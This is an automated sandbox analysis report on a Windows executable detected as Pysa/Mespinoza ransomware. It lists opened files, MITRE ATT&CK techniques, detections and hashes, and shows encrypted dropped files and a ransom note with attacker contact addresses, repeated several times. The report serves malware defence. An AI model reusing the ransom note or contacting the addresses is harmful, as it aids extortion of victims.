                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.dbJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.pysaJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\previews_opt_out.db.pysaJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\previews_opt_out.dbJump to behavior

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management InstrumentationBrowser Extensions1Process Injection2Process Injection2OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
                  Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder1Registry Run Keys / Startup Folder1Deobfuscate/Decode Files or Information1LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Application Shimming1Application Shimming1Hidden Files and Directories1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Local System1Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery23SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  6hFKK8UQi7.exe52%VirustotalBrowse
                  6hFKK8UQi7.exe69%ReversingLabsWin32.Ransomware.Mespinoza
                  6hFKK8UQi7.exe100%AviraTR/FileCoder.nxnua

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted IPs

                  No contacted IP infos

                  General Information

                  Joe Sandbox Version:31.0.0 Red Diamond
                  Analysis ID:322355
                  Start date:25.11.2020
                  Start time:01:54:11
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 8m 55s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:6hFKK8UQi7.bin (renamed file extension from bin to exe)
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:22
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal80.rans.spyw.evad.winEXE@3/1025@0/0
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 12.4% (good quality ratio 11.9%)
                  • Quality average: 74.9%
                  • Quality standard deviation: 23.5%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  Warnings:
                  Show All
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                  • Report size getting too big, too many NtReadFile calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • Report size getting too big, too many NtWriteFile calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  01:56:02AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Readme.README
                  01:56:11API Interceptor1x Sleep call for process: OpenWith.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\$Recycle.Bin\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Reputation:low
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\$Recycle.Bin\S-1-5-18\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:true
                  Reputation:low
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Reputation:low
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Reputation:low
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Reputation:low
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.995147776995582
                  Encrypted:true
                  SSDEEP:3072:0PqHji+ffAIpUqnFtGyVme2p0oXQ/ei2c:SifAEUqn3Gome2pBji2c
                  MD5:109043C12A0800ACDC8702F430C4B5FF
                  SHA1:5590612E50A7400ED893F87272BAE884E640A6CA
                  SHA-256:AF7E54F50981ADC662489D2C1DF3FABE7DCCDBB529E03BD58202A7A3B6A6172B
                  SHA-512:14A561DAD254908988AE180D8000D47E1BF393E9E40EDD8956CFAEF1CA9D83B113F75BEB5C0938719CEB516F89912AE6498BBC45AF7FF2447A1F18F9C43C064D
                  Malicious:true
                  Reputation:low
                  Preview: ...6..V.Q.p......,...D..n\v3...n.d@}.]...M.qs.,.....E..Z..o......@.z......s...-...x...]F..@.....A.;m.M.>W0....$.q..3.jv..dT....|..c.4..fI;..A........."J..].{0.y5."..;~V#....Y\C.5l1.D.o*.C....:....N.1R.....~...........3..T.ew...\Q.....me....u...y...Y^d.6G.3.\......i.p....Z.X..../...S..>.....,u5.. ....b9...Y.Bt..N..X...%:.]N..ImL4!.B.8..o..tQ.._.@...._..z....6..S....$..C.....[..........CzyK..5Z.*....G.zh.(.W.g.I_..&.F.i....x~..7^-..cQf.(...8P......YC.`.P.!;...QZ.....f..@\.~......O.=.......n@.K|$.......Oq.o...K.-..;.....H....w.?.[#*e..c......3Q...-.\...c..\.YM.>H.v.....G|.y.t........8...yK.7.M..-.m.H...........D.%.......3..n.i._......n...Qrj.!.w.}.......7]...~...z..vX..?R..0..YZ{2;....w...,A....f}......c;d..3..+..e...!.G...[......Ww.%$M:..l..|06...*...6'F.G\..pOA,..D|.+;~....+l.......m.7..C.&.......O....r..*....p.a...QO..(+.K..:.+..5..G.......2.r$..\.....c.rg9.J..N.7.ZJ.Q5..G.i&z..'..O...(...I..../..p.../.....Q........#7...:..C...T.@
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.993869313730207
                  Encrypted:true
                  SSDEEP:3072:x46Bg3CH3bkYq2OMslYxpUPenCkHatOAnBX/MUEwio:x46Bg3CNtOMslY0Gnd6tDZ/MUEwz
                  MD5:6E8F9B490C13DE739C903A4EA088C3F1
                  SHA1:D875EC6C24872609713CE1E38F0D42A2AA516B37
                  SHA-256:8BB8607189516FEDBB0B1C164EB80FBC3A7979EDE84E8C2A7C616CD7E3088F02
                  SHA-512:AB28ACAAC61298411CB500414A34E90AA7F5944A636EB5B84F40F648EA4CC26D797B59D02E8B4D8ECB7D3CEAF7D64A7C4C7BF37E87E12FE61E6A2DAF1CBBED66
                  Malicious:true
                  Reputation:low
                  Preview: .t.-...O.....n<r.y..S.:....Xw.=..Sge....#.m....../.q]..o.b7.IEr=g]....-....^^j....IJ.U..HC.5..a..9*/U.h../.2R....Q....#......z.W>.7;^94.....5$..C.S=.Q...?.[ ..v.#.XX.!]-.J3].N.%m......8..,....".9.q.f.......p..T...s......4W.......b?-.._......Ca.v...}0.b.....r...vk.`....i..aB.DN....s..5..;.=...}-....\.LS..l.%kE.!8{.8(...AO>a'#.c.y>....06I.e'BW...../....|.\C..F........3........B....6T>..U...D3........B.3.#$....P.vQ.;.g3C$.=..rPb\TA.t......rT....'l..N..WNG.'..wY..n..,8.....\....e.[:..U.&.Y..].0.O....KB...08.&.W....r.........@=8rdr...z..E...G$oo......a&..P].c)|.e..d...o.c^EQV.s~]g.0.>...~/.........c6.....j...j.9.w.h.[.L.w.ol..{E_.f.y.3<1.w\.!.*F.....(FI.6B3.Rra...[...>..|%...(.....:q..q.W....kX.v..-...H.y.@.-J.....8.^.|..q?6.I.5...r.z.....U"Eb..w......."....x.^'..C...o.S..4/+..Bq@a...$..<Q..5......D..W.s.{.vh...KI9.4.3V........-...............:.g.....H..<;....g....*....c.n6..L...,...f.. ...h....).({F.*....M.D..+q1..."...a....R.GM... ..>.R."Z.....O.E
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):83968
                  Entropy (8bit):7.991828427246029
                  Encrypted:true
                  SSDEEP:1536:yHHdEBdMrlcfcxSFIsCZr/VWri0lMwHyfC2iOsWQIU7AEgkYarKlUx+4:gaPMxchFWgsq2ib7IUcEoQNxz
                  MD5:412FB73909AB6BBFFC3CEDCA1C47D9CC
                  SHA1:B9820E4916F73ADA36FEE9B69AC121D8404A9A17
                  SHA-256:DBBA610BCFE6ACF48891FC8B78F9661C71FA696C268DF8572AF2B4AC8CF53550
                  SHA-512:FDB457359D21AB80DDCF2387F3855E5700075960E3B11F7F6C6D2B81FE3D66FCEE9996CBF2575AC2C630EEB1FD52209F4D3B1D0E08AFD87B27C9A0A7BDDB4E8E
                  Malicious:true
                  Reputation:low
                  Preview: ...~..x.w.W..{?+o....Rk..u..R,..Ao^..*...&.Dm.hJVI......w..Or._...:n.RI..........A.........&.ug.#.2..V.....N.....Xn.KT.J.."..DHk..:.....jOw._.,.,....0...n.+?...7.....="..K...z, ..q....|g..W...V..?..G..*.p.......3..\L.....%f..Q.i.<.j..m$R....W)k...........b....-.{ ..B...S.S.;...$m.....XQe+v.R..=.h....T|...d.....)..........hT..C..2....}...IM.M...|...n.......'%................\g..k.gW<.m..*..m...N...?..||.....$...m..}..DqV..Q......q.x._.....Y$......;..l..". E_i..UC........Q.........rL9W.q.@V.)*..!*..O.t.6Z.^...E\atc.<.i.d.....!.......W..A.....~.....yY.un.........;..<(o..|....=7.*%R...|X..c.....URL})....(,C..K.N...z..NV..;..--gI.<.......e.w..d...rb.#.. >...+..D..Kc.-M../;....h...o..:._......=(..t.......G<......l...pcB...%.Gx};..5lqn..k....F"I..0....r.iKw.x.&...'....\.53..\./....u;..6.o[..&.)C.. .Y.j.t......H........X.E4".x..[.r[.:=mE..."[).i.zr.:N.EK..TA4.@>...;.8..0+..y93W.Ibv..`YK.....7.........HzN.5......T...KShIf.@. B}...bG../.-
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):81920
                  Entropy (8bit):7.991280526421198
                  Encrypted:true
                  SSDEEP:1536:rAS/Mgaxs+vw8QjHFcT9BCSan70M5+BwmbgWBvYlogJHkFXz:rn/ba2F0xaYO1mbFBwlFkFD
                  MD5:4EE5E7D8CFE49AFE87539D079E796764
                  SHA1:F3DC4C4A1077EB7A405548A9898CA16E44CB3187
                  SHA-256:40337FE5219DD1A382D904C693AC061872C16CDBD6DA588072B052837CCCE797
                  SHA-512:590FE84B0BD5404073821E2DB3ABC53E16A8CFA01B638E1E1C5352E198FD0974663E1A0A7A860ABF16807D9AF37D8E77EC2A6B42A7708770A06F9CBFBC28ADEE
                  Malicious:true
                  Reputation:low
                  Preview: H..@o.R+.E.........'..l..[ss.....Q".n... _...e....APp...uD..B.h.4wVi!....u....P^.......]g...$.=*...~.}...Y..%.oW..x.....:G..Ta....RH...1..-...=$q.@... ..n.....`s4....+`&.+tB.r.&.k.a....'..................[.#....j.N..~..@....n....& z.GN..3.e..6......M...\@..@.}Ve..C.........u-k.`....s....F:......q.'.+ttE..Y.O..U.. .{...X0..,...k.k..Y.U.]lL.....J.=..r.........n........`q.^.....Gr/....s. .Y...F.|..'.J.(..m.../]....a..^.p."%b>..3%.o..W.e[....Z..Z..\.H.(.#t]=#..A+...g.d...1{...........Q......sv.. .o..=..>...z...,:..`....qf......2i...R.....<].............)..9..G......]|....,.L.5.f...h.4Z..q.[...1j}uR]....Y%,".....FN.F8.I.....~.#..r. f..J.nGE.Q.O.a...a.i..tv..!>..^t..%..f...../.).........V...}.Ra.S.k......A..%. Rs#.H_.+../B....O.....EDL&r.....N.^...R...?.u.. Q<.|....=.R...o...U.qB.6m..$...4.h..i.B..v#m.....R..`.O.]b..$.^...0.4Bn......[....*.<.H.".....]>q.C).8.....hrL.({.^...._.j[3lG.G...............;S.D...A1.<......x.;.O5..ke...._g6..%.....\4#..b
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):411648
                  Entropy (8bit):7.999439540415626
                  Encrypted:true
                  SSDEEP:12288:oFmkDwnqN5HSEEBBdQv7H9WljZCzbP582bY:ocPnqnHTEKv798Ezby2s
                  MD5:0D0C35BE43B7D86481F7E68B440E90A8
                  SHA1:FAE44C9FFF20D5E1EDEAAF6B39FA973F84F94282
                  SHA-256:0E3E6E1E10CB1C35193ACBE11E0CF893289A3067682F2A2416A383C9F1037E19
                  SHA-512:F8446F9DC4F741A6002469555CF1AAC53028ECCF4BE6453C55225626C5E6C661BBC8767069232FE024DC399BE4043052B28459DA240C921E3C15B0D99E81FA54
                  Malicious:true
                  Reputation:low
                  Preview: (\....g.X ..nj<.......M.@....LR..w.(.(K.O..5..)DBF;*...y....../..f...F.....p.{t.4A0 8Fa..p.jx.Q..z..AqA;....}#.....Ew......w8BD..v./...o.K.X..3R\xS..,...<.r'.X....p....@...F[.*.....(..E4.....)f.q.R.V.B.."v...g.:a&.s3&5U.....O.v......y....:3.............h....:...W....fSv. \E."75......3..}..M...!....O0...19......0aM.-....)..y}.ynk.H...R...`....0.m..iq...CV>.pvV._..IG..m.%!..:.._Tt....g.... .>..9....:.?w.....O...fS+.{6.....&.R.N.....h(.fq..`.]W%A...q......6...C.. .....;..:Gd...?$...F.wP`pTAi3..=N....).t.6e.IB..d`.c.ZQq....3..Q.uR(...J.(.Q...p.x....K.hp.-vb.\.].G:.^.J.....}7O.T...Qc`........",q./...D.`......$Gf..?..P.S...o..=..T..NH..AP.#(^.X.]i.....3.:d..0.5...\.=e.[....m^.K._.E...!..r..f..Z...x}m.c..Q]...4......N.......H.%.....Z{.....*.V\......~;B1....w..wl0...5}8O1...i.........d.h&7.n?$N.u.v...^m..P.X$Lu.r...e.&.....w..Pw.....T..X...i...(....+......l..*.?....s......};..l..j.ay.....`K!........9..o?%...:....aqm.K,7..{.S>...Q....Ff....Y.7._.
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.7772790736660715
                  Encrypted:false
                  SSDEEP:96:jSlBjkZPGUHV/1MVM8TldyTa/tkMyvDSi4kfZIaDGni0Nsm8spULP:jSHkdzV/1UM8TlYmtnoSD2GN58QO
                  MD5:2BF4D821A13CB7FDAF35F2FFF0284CEB
                  SHA1:530737B6805BE0805BDD8A50025A3D1698D1E04F
                  SHA-256:263E22AFB99BA79201AB390C7EEC9F7BA875D9C700DEAD3A3406A22E030D477F
                  SHA-512:09CB7D243EBE024F07E7E04C606F998B1898DED534F0521ADE9F854EE9B814F731209388F3A0EF5A0CDD2543D80FE4E1A36A574E313A26ED18177ACF23B18287
                  Malicious:false
                  Reputation:low
                  Preview: k1A........!.rO....U...jy.....8.5.. ....Wb.J..e....[T..I..;.t.-.g'.q.7.e...?LqO..@..c.=......;W...u&.P...z...y.......3.h..G..$.bH_......d.!).3,..@^`...t....8CA.....e88.$.Q..b.>.L.....n/...p.6...]tE>..7.....y3.E&.9?[.3%.1...>-.^......C......g"......b.^../..|..<...?.........>.....(.+Z&.7>.A.bl.oC.....K.-..N.F..a..?1..~).FG4...o.....$......*~f.~L....#.!nS`.#q..).8ej.......qU....W.m`..~?.B...&:i......$G.!?yy...GSq..'.J....K...~O...m....)...Jm..$.w}&.n.@,...iS.R...W..].Wh.....[.."..UDb#.\z.m.v..~.n.?.....}........u........Q.`Ff..%).i!...........M....E...........'{..........G.P9.f<......]|>..c..A\.+..D%..1...(..Y........,yz..2.>i...c.r.H..O....x.a..i=%)..!.:..b..._.NS.R.....>..-# ...6c.{..p,&bN..0..~q.f.Q. sJ...'...Q.i.....r%Y..!.}_..\y?J..,.(#A. o|..9&.'...<O.B.7......d...4..-Z.O5..q,..>....[g&...F...T9..6.$...k.~..UF...b.JC....O..x....[.dT.%...R.w-..nS...Oy..q.Z8.2,.X.WA.&}.J....|..O!.".0)t..D...I.h\3..w...`...=U.ff.....s.w.
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.786342845438114
                  Encrypted:false
                  SSDEEP:96:tXImB0UMRx0jUT0WgctLiDr1DlFjEHM/CZow:r0l6UT0hct4rdlZEHeCyw
                  MD5:C6B5A20491C5EC5F7634A80BFCFDF616
                  SHA1:2E528CA171C3B6F9A7734152156174EED0DE18CA
                  SHA-256:A0EB60E30D1A6B5BD52DEBE9444D1344998169FE718BD4DE6D75BA83C045D7E8
                  SHA-512:671DED77C81B12DD2EC06E8F3441E494FB2AB49ED500697D929989D802AB009F5182E9A19FD32B4D976C09AD2DB32D64CB5E0CD6CA0B7D4EB6AE539642E3A504
                  Malicious:false
                  Reputation:low
                  Preview: J82...Y9.1/...C. ....@.d\V...`O....iz.d.C..../Qn.#....G...Ot,2.0..bH.N...A.Q,.P.fd...L[...F.8..O.!....i..X...1.V4.#.+s........Xv.\..U.#.............y.V....$.u....K.".`{...i.g.X.T.bm..Z..<.d[..K.0_O..&.......Q..v.I...3.....CY.u).2.qP5......j...J5.........)i?.c..;....9...|...Hw.....Y..B...=...h>.......'i....?s..<.F...S.G.ki..q..I=;........T....r.02.Bf....ru.n.6...2Fb!.]y.3.}/...I...S...G].ng...gg......7Z....&.V$..?..R.Hm.B.c(...i.6.p..J../#E1Kx=.:.g...h.le..<...z..x.w.N......~.SeI..3..pv.7.m.Oa4.j.T..\L.U....Kx.e[S..:..E.x.\.e_.KA...R.....\..z....,.[X.....bZz,H.Z....B.g;E...o|.,....Z.......6...B.\..g.6.?f.Fv..U...&.s.I..A..(^.+..,.H.....g...[..c...B.@..l..= .......,..q.....2...Z.K.hT..X...i...C..08.})u..h.E.......I..Ysc.... ..... ...;....A.St.X..!8.....6Y(..?...U...*.Q..T..>*/.T.[..bcZ.u..74+.m...o.Y.e`.V......V.....V....c..q....=;. >.....4k.<R..H.L...4./Z<.i..,.'..B$>;....L..[9:.np.3,P.e.Z..c..|w............q..B5%....Bl...w0L.q..8n..M..sLx.
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):309248
                  Entropy (8bit):7.999029009772014
                  Encrypted:true
                  SSDEEP:6144:xqjyV3+51fUOl6aym8fYRvvl75bAFaJQGwAYcUQdMt6/P3GyIM5JZO4kgRQ:o7LMOl6aym8QRvvPbmncULc3GnEHBu
                  MD5:5BE853376088D2DFCE29C69B56288B45
                  SHA1:DAC753C90524B95261B23167EF506E028AF60FC4
                  SHA-256:084D315A0A07E1F37318E1B768B70749F22A5137C9EC6039E89FA84E08446298
                  SHA-512:433BBF21339F377D29658897A6F911D565A706F906280B5500ED5E551A647FB62F2A4296BDC610F56126434D975DF3E48C0C86A309B8F369E6DAAE53A3AE4120
                  Malicious:true
                  Reputation:low
                  Preview: .Y./4..F...q.$..U-.E../p...&..dzK.So..6.z.2............+..MTN@.kG).f....#Bs.D...q.......-....P..s..z........gp..W.....J.-......<&.....^'.P...=..$;{.Ua}..<.m..e....AR..F....X}...i..c.N...\.Y.....4...e...T7.m....K.1.c..../..E.[. '..Y.'..E..UT2..j....9.Q.......R.=.AAn....(U.-.w....x..h..k.GR..C..[.K..b.rQN....*.a...(.F..'M.|W.6S..$E..2&m.....$...<q3x..w.\JEe@..o........`iNBa...^.V.....=X....$.......D.$..h!.8Zm.a..0vrk:.6....%.rR......$.........S..r.=.t...@...SkO.0.u..\.PT..^,}D+..TG.T/..[.d.LKD.>..F..b....W...q...."DA....MQ....'m.S|Vk..{X.@..FM..._.h. ....Fz...v._)..b}2BP.K...?j8....`.WU...M.3*.{......O6.0..h.....Z.D...x}.(...~.]....}(......#..Oo....b{.....1W.!.JW.....VFK..H.f..O.q..}|;.4.....4.~."a...1.t:...m......g..X.y.......v,LV..%.....^..Q.323.~d.k. 